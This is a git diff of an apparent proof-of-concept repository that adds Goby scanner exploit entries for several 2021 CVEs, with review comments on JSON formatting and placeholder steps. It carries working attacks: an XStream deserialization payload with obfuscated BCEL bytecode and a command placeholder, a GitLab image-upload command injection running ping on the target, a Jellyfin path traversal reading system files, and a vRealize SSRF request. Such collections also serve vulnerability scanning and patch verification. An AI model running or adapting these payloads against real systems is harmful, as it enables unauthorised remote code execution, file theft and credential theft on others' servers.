f0$92g$da$96$8ao$d0C$e7A$b4OB$e7C$L$87$_$W$a9$96$fd$d3$dc$x$d8t$80$3a$b6$ab2$s$_$e6k$b2$9c$x8$94$3a$9d$o$a3$d2$baM$7eO$ac$t$fb$a8$d5$98$846$d1d$db$f2$f8$86$X44kW$ea$a6$d5$98oQ$J$9f$j$VT$f7$o$z$C$89$84$eeX$f6$d1$ca$8fmC$i$ab$f4j3$bf$d3$3b$f8$5c$d9$e6$b3$V$a5$b6B$E$d7$60Zk$f6$K$5d$86$d1$adX$953Y$83U$V$f5l$XI$90EM$wi$b4n$_$D$Z4$91A$ae$5c$e2$8eQ$b1j$n$7e$82$T$e3$f0$7c$b5$p$bd$8f$c9$bf$a6$81$C$d2$e5$5e$da0$b8$eb$9a$c1$Q$I$c5$$$8b$nQO$c8$S$8e$ec$90$cc$8e$91$87$d7$c5U$a1$O$ed$b4$3b$c1$v$ae$a7$3b$9e$7b$c9$f4$K$ffbty$f3$b4$H$d2$d9$b2$e5$99$ab$E$a8P$i$P$98$b6$9a$a2T$c5$a2$97ny$c1$ad$5e$b2$b6$d8T$cfvx$ca$8bop$83$a6$d1c$cas$de$b1E$z$c6j$a2
$a9$Ki2P4SV$a9$ec$91$t$d7W$e9flFD$d3b$8b$82$dc$3bc$3b$wD1$d4$b2$cb$tx$d1$5c$adL$97$ff$Ii$eb$cd$tLV$d0$dd$Z$ba0$c1$q$a7$82$85$ac$80$a9$bda$P2n$$$d1$c2$Lf$fa$9c$a3$h$i$87p$94$9e$m$f1$t$d1$3fMj$a2$c7$88$f9$k$Nh$q$e9_$c7$ee$40$ba$8b$3a$l$f5$d1$90$8fp$f6x$b4$a1$feg0$l$f2$f4$J$89V$R$l$caL$af$8fF$lj$b4$c9$c7$aeTH$L$91e$b3$W$oiK$w$ac$85I$Z$dd$5duJ5h$NZ$b8$ea$f7$x$a2$v$a6$b1h$ab$8f$3d$C$o$da$W$o$ab$f9$fah$7bN$98$ca$9a$dcK$82$I$J$3ar$81y$7b$w$a2E$a2$9d$3e$b4$5b$Y$f9$J$7b$e7$efb$9f$Wi$e9$f2$b1$df$c7$T$3e$O$dc$c1$c1$uq$87R$8a$c64$c5$c7$e1$5bh$U$df$to$p$i$7d$8a$b6$b9$N9$7b$dc$c7$91$l$u$cf$Q$7e$c3$ef$f4$o$d6$e18e$3a$83V$a2$wIw$a1$F$cd$d8G$b4$h$bb$R$a7$d7w$94ti$ec$c1$F$b4A$a7$f7$b6$80$O$9a$ee$9d$b8$J$N$df$91$e5$5d$ec$t$ac$$B$3b$80$3fp$Q$7f$e20N$Q$da2$c2$f7q$P$8d$M$bd$M$7d$M$fd$M$D$M$83$B$a5$f5P$40$e3$8c$7e3H$c4$dd$a7$98$fe$87i$5d$c0$c5$efS$dc$e4$d5$L$f1$U$tB$e4$9b$a4$j$eb0$fc$P$y$j$c8$d7$88$I$A$A
</string>
</a>
</outer-class>
</names>
<processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>
<parent class='sun.misc.Launcher$ExtClassLoader'>
</parent>
<package2certs class='hashtable'/>
<classes defined-in='java.lang.ClassLoader'/>
<defaultDomain>
<classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>
<principals/>
<hasAllPerm>false</hasAllPerm>
<staticPermissions>false</staticPermissions>
<key>
</key>
</defaultDomain>
<domains class="java.util.Collections$SynchronizedSet" serialization="custom">
<java.util.Collections_-SynchronizedCollection>
<default>
<c class="set"></c>
<mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/>
</default>
</java.util.Collections_-SynchronizedCollection>
</domains> <packages/>
<nativeLibraries/>
<assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>
<defaultAssertionStatus>false</defaultAssertionStatus>
<classes/>
<ignored__packages>
<string>java.</string>
<string>javax.</string>
<string>sun.</string>
</ignored__packages>
<repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>
<__path>
<paths/>
<class__path>.</class__path>
</__path>
<__loadedClasses/>
</repository>
<deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>
</processorCL>
</iterator>
<type>KEYS</type>
</e>
<in class='java.io.ByteArrayInputStream'>
<buf></buf>
<pos>0</pos>
<mark>0</mark>
<count>0</count>
</in>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
</java.util.PriorityQueue>
</java.util.PriorityQueue>\n 2\n \n \n\n"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "62962DAA55198E163F6CC3F7E3F1A505",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/services%20/WorkflowServiceXml",
+ "follow_redirect": false,
+ "header": {
+ "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE",
+ "Content-Type": "text/xml;charset=UTF-8",
+ "Referer": "5c8ca382ae7a70a3c56e7d6c5f6603dc{{{cmd}}}"
+ },
+ "data_type": "text",
+ "data": "\n \n \n <java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='javafx.collections.ObservableList$1'/>
</default>
<int>3</int>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<contentType>text/plain</contentType>
<is class='java.io.SequenceInputStream'>
<e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
<iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
<names class='java.util.AbstractList$Itr'>
<cursor>0</cursor>
<lastRet>-1</lastRet>
<expectedModCount>0</expectedModCount>
<outer-class class='java.util.Arrays$ArrayList'>
<a class='string-array'>
<string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dU$ebS$TW$U$ff$z$q$dc$cd$b2$I$E$Q$a2U$b1$z$g$E$S$K$f2$K$d6$8a$3c$w6$m$rT$Em$ed$b2$b9$c0B$d8$8d$fb$A$fa$7e$bf$9f3$fd$e4$l$d0$f1$b3_V$a7$9dv$3a$d3$_N$db$P$ed$3fTz$ee$s$I1$b46$99$b9$7b$cf$f3$fe$ce9$f7$9c$fb$db$df$3f$fc$M$e0$y$beU$Q$c1$80$82A$M$89$r$rcX$c19$3c$x$e3$3c$c3s$K$Y$$0$8c$u$b8$88Q$a19$s8$e32$s$c4$f7y$F$970$v$96$cb2$5e$60H$cb$98b$98$96qE$c6$8c$82F$bc$c80$ab$m$839A$bc$qvW$V$cc$e3$9a$82$W$y$c8X$U$df$ebb$b9$n$96$97e$bc$a2$m$8a$9b$M$af$wx$g$g$c3$92$84$aas$86i$b8$e7$rT$c6$db$afJ$I$8dZY$$$a16m$98$7c$da$dbX$e2$f6$9c$b6$94$pNM$c6$d5$f4$f5$v$z$l$d0dJ$f0$Zt$C$cf$90$rl$E$8c$d0$90k$JJ$c6$f2l$9dO$Y$c2N$k$bf6$93X$d365$V$a7$Rg$e0$w$96$b1$a2b$V$86$84$d3$ba$b5$91$d05O_$b5$S$sw$b7$y$7b$3d$913$i$97$9b$899$3d$9f$b1$f4u$ee$S$92u$865$V$eb$c8I$a8_$e1$ee$a8g$db$dctg$f9$z$8f$3b$$$81$V$ee$939$cd$5cI$8e$e64$c7Q$b1$BSB$dd$k$fb$ca$d2$g$d7$5d$82$ab$c2B$5e$c5$z$d8$w$i$d8d$7b$d3$e6N$de2$j$3e$a1$e9Z$96$d0$b9$f0$u$o$V$9b$d8R$b1$8d$d7$qD$e8$ccy$dbp9$e9$l$K$9c$gVr$97$n$84$978Y$da$r$tf$5c$db0W$q$b0Y$be$ccm$nl$ed$d3$Hu$adw$b0G$e3$D$da$40$b7$d6$ab$f7$f5$f3$81l$bf$de$b7$dc$df$df$dd$9b$rl$af$e3$N$8a0p$e2$b9F$$$99$d15$d3$e46$c3$9b$w$de$c2$db$w$de$c1$bb$w$de$c3$fb$M$l$a8$f8$Q$l$89$9c$7e$y$a1$e2$c6$88$8aO$f0$a9$8a$cf$f0$b9$8a$_$f0$a5$E$a8$f8$K_Kh$d8$c34$be$ad$f3$bckX$a6$8ao$Q$a7$8aSi$q$b4$ec$v$d8$7c9GyJNqw$d5$caJh$$$XM$Y$3c$97$z$89tn$d5$a6$f0$e9$82$e8$85$b2$ec$d2$8d$f1$f6$f4$a3Z$c3$S$9aD$B$z$d3$e5$dbnP$ac$b4U$c8$5d$acD$7d$9fH$d8$i$u$a0$dc$e7h$Tp$q$b4$c5$d3$8ff$7f$b8$cc$e3p$a1$5e$bb$f1$5d8$c0$e6z$99$cd$7e$_$a5$Z$owU$86$b9i$ad$d3$3d$l$da$ef$abp$dfJ$7c$VY$ed$e5$y$ea$R$91$93B$Y$N$e5i$m$85$gR$c8xyn$eb$F$ad$3a$a2$c78$R6$cf$W$x$d2$f5$98$f8K$K$u$5c$3a$dc$j$d1u$ee8F$d0$df$a1$f8$a2$e8$ffJ$f2$y$e1$d4$B$c1$i$88$5cq$5c$cdv$9dy$c3$5d$a52$j$Eaq$f7F$H$dcY$cft$8d$N$3aN$a1s$k$SM$rA$X$d9$a2V$8e$b7$e4$U$h$a9$v$3e$d9$5e$ee$9ep$f3m$ae$d3$qyL$f83$b6$rb$j$$ASdRW$T$9aI3$ef$b9d$c9$b5$N$ba$f9$bb$88$a8$d3$f7$J$c8$bc$r$7e$a0$40$e4N$f5$i$3e$c6s$c6Fa2$fc$H$a4$fd$ddM$3e$d9$aa$e6LSC$EC$98$S$W2$D$a2
$b4$83$kF$i$de$S$a3$e7_$d2M0j$f3$b4u$83q$3dgk$3a$c7I$9c$a2$a7E$fc$q$fa$d3$U$a6$b5$9d$88$efQ$85j$e2$feu$e6$k$a4$fb$a8$f0Q$Z$N$f9$I$a7$3b$a2U$95$3f$81$f9$90$a7$3a$r$daE$7c$u$d3$5d$3e$aa$7d$a8$d1$g$l$87R$a1X$884kc$n$e2$d6$a5$c2$b10$J$a3$f5E$a3TU$ac$w$W$$$da$fd$82h$8a$J$dbhC$88$c4$L$95$d1$c6$8c$d0$91cr$X1$o$c4h$ca$Ez$8d$a9H$y$S$3d$ec$a3$f96$G$7fD$cb$c2$7d$c4b$91$baV$lG$7c$i$f5$f1$c4$3d$i$8b$k$f7q$o$a5$c4XL$f1$d1z$h$d5$e2$7b$f2$O$c2$d1$t$7d$3cu$Hr$ba$c3G$db$5d$K0$84$H$f8$9d$5e$b9$K$9c$a1$Q$_$d3$bb$tFb$I$87P$87Z$i$a5$b5$N$f5$e8$r$fe$Q$g0$o$5eS4A$c3axh$a69$da$82$efp$EwI$f3$BN$90$a7c$f8$D$c7$f1$t$r$b3$83$3c$ad$n$bc$83_Q$cd$d0$c9$d0$c5$90$60H2t$H$x$ed$9f$J$d6$kF$fe$r$a2v$I$cf$ffP$ad$I$a8$9e$j$c2LV$9d$c0E$86$b3$n$b2$ed$a3$T$x$d0$ff$P$ca$d2$a5$5eU$I$A$A
</string>
</a>
</outer-class>
</names>
<processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>
<parent class='sun.misc.Launcher$ExtClassLoader'>
</parent>
<package2certs class='hashtable'/>
<classes defined-in='java.lang.ClassLoader'/>
<defaultDomain>
<classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>
<principals/>
<hasAllPerm>false</hasAllPerm>
<staticPermissions>false</staticPermissions>
<key>
</key>
</defaultDomain>
<domains class="java.util.Collections$SynchronizedSet" serialization="custom">
<java.util.Collections_-SynchronizedCollection>
<default>
<c class="set"></c>
<mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/>
</default>
</java.util.Collections_-SynchronizedCollection>
</domains> <packages/>
<nativeLibraries/>
<assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>
<defaultAssertionStatus>false</defaultAssertionStatus>
<classes/>
<ignored__packages>
<string>java.</string>
<string>javax.</string>
<string>sun.</string>
</ignored__packages>
<repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>
<__path>
<paths/>
<class__path>.</class__path>
</__path>
<__loadedClasses/>
</repository>
<deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>
</processorCL>
</iterator>
<type>KEYS</type>
</e>
<in class='java.io.ByteArrayInputStream'>
<buf></buf>
<pos>0</pos>
<mark>0</mark>
<count>0</count>
</in>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
</java.util.PriorityQueue>
</java.util.PriorityQueue>\n 2\n \n \n\n"
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-05-21 22:24:07",
+ "GobyVersion": "1.8.275",
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "CVEIDs": null,
+ "CVSSScore": "0.0",
+ "AttackSurfaces": {
+ "Application": null,
+ "Support": null,
+ "Service": null,
+ "System": null,
+ "Hardware": null
+ },
+ "DisclosureDate": "2021-05-22"
+}`
+
+ ExpManager.AddExploit(NewExploit(
+ goutils.GetFileName(),
+ expJson,
+ nil,
+ nil,
+ ))
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-40438/poc/goby/wait_to_be_added b/2021/CVE-2021-21350/poc/nuclei/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-40438/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-21350/poc/nuclei/wait_to_be_added
diff --git a/2021/CVE-2021-40539/poc/goby/wait_to_be_added b/2021/CVE-2021-21350/poc/oneliner/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-40539/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-21350/poc/oneliner/wait_to_be_added
diff --git a/2021/CVE-2021-41277/poc/goby/wait_to_be_added b/2021/CVE-2021-21350/poc/others/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-41277/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-21350/poc/others/wait_to_be_added
diff --git a/2021/CVE-2021-21350/poc/pocsuite2/wait_to_be_added b/2021/CVE-2021-21350/poc/pocsuite2/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-21350/poc/pocsuite2/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-21350/poc/pocsuite3/wait_to_be_added b/2021/CVE-2021-21350/poc/pocsuite3/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-21350/poc/pocsuite3/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-21350/poc/xray/wait_to_be_added b/2021/CVE-2021-21350/poc/xray/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-21350/poc/xray/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-21402/poc/goby/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json b/2021/CVE-2021-21402/poc/goby/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json
new file mode 100644
index 000000000..bd7b941ad
--- /dev/null
+++ b/2021/CVE-2021-21402/poc/goby/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json
@@ -0,0 +1,158 @@
+{
+ "Name": "Jellyfin 10.7.0 Unauthenticated Abritrary File Read CVE-2021-21402",
+ "Level": "2",
+ "Tags": [
+ "Disclosure of Sensitive Information"
+ ],
+ "GobyQuery": "(title='Jellyfin')",
+ "Description": "Jellyfin is a Free Software Media System. In Jellyfin before version 10.7.1, with certain endpoints, well crafted requests will allow arbitrary file read from a Jellyfin server's file system. This issue is more prevalent when Windows is used as the host OS. Servers that are exposed to the public Internet are potentially at risk. This is fixed in version 10.7.1. As a workaround, users may be able to restrict some access by enforcing strict security permissions on their filesystem, however, it is recommended to update as soon as possible.",
+ "Product": "Jellyfin",
+ "Homepage": "https://jellyfin.org/",
+ "Author": "PeiQi",
+ "Impact": "Attackers can read arbitrary files to obtain sensitive information of the server
",
+ "Recommandation": "undefined
",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "File",
+ "type": "select",
+ "value": "windows/win.ini",
+ "show": ""
+ }
+ ],
+ "ScanSteps": [
+ "OR",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/octet-stream"
+ },
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "font",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "file",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "extension",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/octet-stream"
+ },
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "font",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "extension",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "file",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "OR",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/octet-stream"
+ },
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/octet-stream"
+ },
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-04-07 21:05:13",
+ "GobyVersion": "1.8.255"
+}
\ No newline at end of file
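Review bot: The `Impact` and `Recommandation` values in this file contain a raw line break inside a JSON string literal, which strict parsers reject (Go's encoding/json fails on an unescaped control character in a string), so the entry may load in Goby's own reader but not in anything else that consumes this repository; the same pattern appears in the vRealize, F5 BIG-IP, Confluence, Exchange and Lanproxy entries added later in this commit. The key is also spelled `Recommandation` here and in those files while the GitLab and Hikvision entries use `Recommendation`, and its value `undefined` is a placeholder rather than guidance. Since the Description already names the fix, the field can carry it on one line: `"Recommendation": "Upgrade Jellyfin to 10.7.1 or later; until then restrict filesystem permissions for the Jellyfin service account.",`. `Abritrary` in the Name and in the filename is a typo for `Arbitrary`.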
diff --git a/2021/CVE-2021-21402/poc/xray/CVE-2021-21402.yaml b/2021/CVE-2021-21402/poc/xray/CVE-2021-21402.yml
similarity index 100%
rename from 2021/CVE-2021-21402/poc/xray/CVE-2021-21402.yaml
rename to 2021/CVE-2021-21402/poc/xray/CVE-2021-21402.yml
diff --git a/2021/CVE-2021-21972/poc/xray/CVE-2021-21972.yaml b/2021/CVE-2021-21972/poc/xray/CVE-2021-21972.yml
similarity index 100%
rename from 2021/CVE-2021-21972/poc/xray/CVE-2021-21972.yaml
rename to 2021/CVE-2021-21972/poc/xray/CVE-2021-21972.yml
diff --git a/2021/CVE-2021-21975/poc/goby/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json b/2021/CVE-2021-21975/poc/goby/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json
new file mode 100644
index 000000000..ac7252343
--- /dev/null
+++ b/2021/CVE-2021-21975/poc/goby/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json
@@ -0,0 +1,121 @@
+{
+ "Name": "VMWare Operations vRealize Operations Manager API SSRF CVE-2021-21975",
+ "Level": "2",
+ "Tags": [
+ "SSRF"
+ ],
+ "GobyQuery": "app=\"Apache-Web-Server\" && title==\"vRealize Operations Manager\"",
+ "Description": "malicious attackers who access the vrealize Operations Manager API through the network can perform server-side request forgery attack to steal management credentials.",
+ "Product": "VMWare Operations vRealize Operations",
+ "Homepage": "https://www.vmware.com/cn/products/vrealize-operations.html",
+ "Author": "PeiQi",
+ "Impact": " can perform server-side request forgery attack to steal management credentials.
",
+ "Recommandation": "undefined
",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/casa/nodes/thumbprints",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/json;charset=UTF-8"
+ },
+ "data_type": "text",
+ "data": "[\"127.0.0.1:443\"]"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "not contains",
+ "value": "error_message",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "thumbprint",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "address",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/casa/nodes/thumbprints",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/json;charset=UTF-8"
+ },
+ "data_type": "text",
+ "data": "[\"127.0.0.1:443\"]"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "not contains",
+ "value": "error_message",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "thumbprint",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "address",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-04-07 23:45:28",
+ "GobyVersion": "1.8.255"
+}
\ No newline at end of file
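Review bot: The `ExploitSteps` block is a verbatim copy of the `ScanSteps` request (same POST to `/casa/nodes/thumbprints` with the fixed `["127.0.0.1:443"]` body and the same four checks), and there is no `ExpParams` or `HasExp` entry, so running the entry in exploit mode only repeats the detection probe and labels its output as an exploit result. If the entry is detection-only, dropping `ExploitSteps` would state that honestly; I cannot tell from this file whether Goby requires `HasExp` when `ExploitSteps` is present. The Description gives no fixed version and `References` lists only the author's wiki, so an operator who gets a hit has nothing here to act on; the vendor advisory and patched build should be referenced.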
diff --git a/2021/CVE-2021-21975/poc/xray/CVE-2021-21975.yaml b/2021/CVE-2021-21975/poc/xray/CVE-2021-21975.yml
similarity index 100%
rename from 2021/CVE-2021-21975/poc/xray/CVE-2021-21975.yaml
rename to 2021/CVE-2021-21975/poc/xray/CVE-2021-21975.yml
diff --git a/2021/CVE-2021-22205/poc/goby/CVE-2021-22205.json b/2021/CVE-2021-22205/poc/goby/CVE-2021-22205.json
new file mode 100644
index 000000000..5043efc1b
--- /dev/null
+++ b/2021/CVE-2021-22205/poc/goby/CVE-2021-22205.json
@@ -0,0 +1,138 @@
+{
+ "Name": "Gitlab RCE CVE-2021-22205",
+ "Level": "3",
+ "Tags": [
+ "rce"
+ ],
+ "GobyQuery": "(app=gitlab | title=\"gitlab\")",
+ "Description": "An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution",
+ "Product": "gitlab",
+ "Homepage": "https://about.gitlab.com/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2021-22205"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/users/sign_in",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$head",
+ "operation": "contains",
+ "value": "experimentation_subject_id",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "X-CSRF-Token|lastbody|regex|name=\\\"csrf-token\\\" content=\\\"([\\s\\S]+?)\\\" />",
+ "output|lastbody|text|"
+ ]
+ },
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/uploads/user",
+ "follow_redirect": false,
+ "header": {
+ "X-CSRF-Token": "{{{X-CSRF-Token}}}",
+ "Content-Type": "multipart/form-data; boundary=---------------------------99652559321225150602861519786",
+ "X-Requested-With": "XMLHttpRequest"
+ },
+ "data_type": "text",
+ "data": "-----------------------------99652559321225150602861519786\nContent-Disposition: form-data; name=\"file\"; filename=\"demo.jpg\"\nContent-Type: image/jpeg\n\nAT&TFORM\u0000\u0000\u0000tDJVUINFO\u0000\u0000\u0000\n\u0000\u0000\u0000\u0000\u0018\u0000,\u0001\u0016\u0001BGjp\u0000\u0000\u0000\u0000ANTa\u0000\u0000\u0000N(metadata\n\t(Copyright \"\\\n\" . qx{ping -c1 {{{check}}} } . \\\n\" b \") )\n\n-----------------------------99652559321225150602861519786--\n",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "422",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "Failed to process image",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-04 16:35:47",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
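Review bot: The `ExploitSteps` request fetches `/test.php` and passes whenever the body contains the string `test`, which has no relation to the upload vector exercised in `ScanSteps`; together with `"ExpParams": null` this looks like a leftover template, and with `"HasExp": true` it will report a positive "exploit" on any host whose 200 page happens to contain `test`. Setting `"HasExp": false` and removing the block would stop the false result. Note for operators and detection engineers that the scan step itself is not a passive check: the multipart body carries a `ping -c1 {{{check}}}` command, so a scan with this entry executes a process on the target; `{{{check}}}` is not declared anywhere in the file and is presumably a Goby-supplied out-of-band placeholder — worth confirming, since otherwise it is sent literally. `Impact` and `Recommendation` are both empty although the Description names the affected range; a one-line `"Recommendation": "Upgrade to a GitLab release that includes the fix for CVE-2021-22205.",` would give readers the action.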
diff --git a/2021/CVE-2021-22214/poc/xray/CVE-2021-22214.yaml b/2021/CVE-2021-22214/poc/xray/CVE-2021-22214.yml
similarity index 100%
